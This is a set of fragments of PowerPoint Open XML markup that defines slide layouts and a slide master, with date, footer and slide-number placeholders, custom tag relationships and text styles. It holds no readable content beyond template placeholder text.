          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
            <p:custDataLst>
              <p:tags r:id="rId6"/>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322759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custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>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custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2A0AB15E-FFE3-4B47-B9E2-DD4B5E55497A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
            <p:custDataLst>
              <p:tags r:id="rId6"/>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277014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custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{81FD670A-49D5-6B44-876E-D2BDD5B5BF5A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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891156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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{653081F9-3F3A-B044-B1B3-3E71C9E162B6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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9520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457200" y="3034508"/>
            <a:ext cx="6951274" cy="1308892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="0" i="0" cap="none">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Section Header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492724" y="1524000"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="b" anchorCtr="0"/>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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{37AABCFA-591C-9145-B44A-9EFDDC32D4B1}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</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404513933"/>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2">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1264380" y="2013343"/>
            <a:ext cx="6951274" cy="753670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="0" i="0" cap="none">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Section Header 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1264380" y="2919413"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D01F7D1C-C9EC-E743-9063-B0846E758DFA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</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626498161"/>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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="4038600" cy="4678363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1447800"/>
            <a:ext cx="4038600" cy="4678363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{40582EA0-B875-B64A-B17C-15E030E9CF15}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14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B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2831320049"/>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custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1535113"/>
            <a:ext cx="4040188" cy="446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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="4040188"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custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645025" y="1535113"/>
            <a:ext cx="4041775" cy="446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custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645025" y="1981200"/>
            <a:ext cx="4041775"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custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{74391607-EAAA-2946-9E02-E1C11496083C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
            <p:custDataLst>
              <p:tags r:id="rId8"/>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419685268"/>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54391509-7D79-C647-92BF-4A0564F0C41A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>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302077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FBD64FD0-82A6-144B-A86D-7BBA3EAF78C2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>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3949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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4800" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>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custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{82B93CA3-029B-EF42-8B8C-890C6E340BE0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</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0548059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tags" Target="../tags/tag1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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tags" Target="../tags/tag66.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag67.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag68.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag69.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag70.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457200" y="152400"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="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custDataLst>
              <p:tags r:id="rId15"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="4754563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="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custDataLst>
              <p:tags r:id="rId16"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{9E030486-F0B4-6B43-883D-CC3D390117E7}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
            <p:custDataLst>
              <p:tags r:id="rId17"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6492875"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3229604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b="0" i="0" kern="1200" spc="-50" normalizeH="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Cambria"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="292100" indent="-292100" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="3200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="635000" indent="-292100" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="914400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="–"/>
        <a:tabLst/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1320800" indent="-177800" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="»"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>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457200" y="152400"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="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custDataLst>
              <p:tags r:id="rId15"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="4754563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="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custDataLst>
              <p:tags r:id="rId16"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{9E030486-F0B4-6B43-883D-CC3D390117E7}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/7/14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
            <p:custDataLst>
              <p:tags r:id="rId17"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6492875"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}"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99898918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b="0" i="0" kern="1200" spc="-50" normalizeH="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Cambria"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="292100" indent="-292100" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="3200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl1pPr>
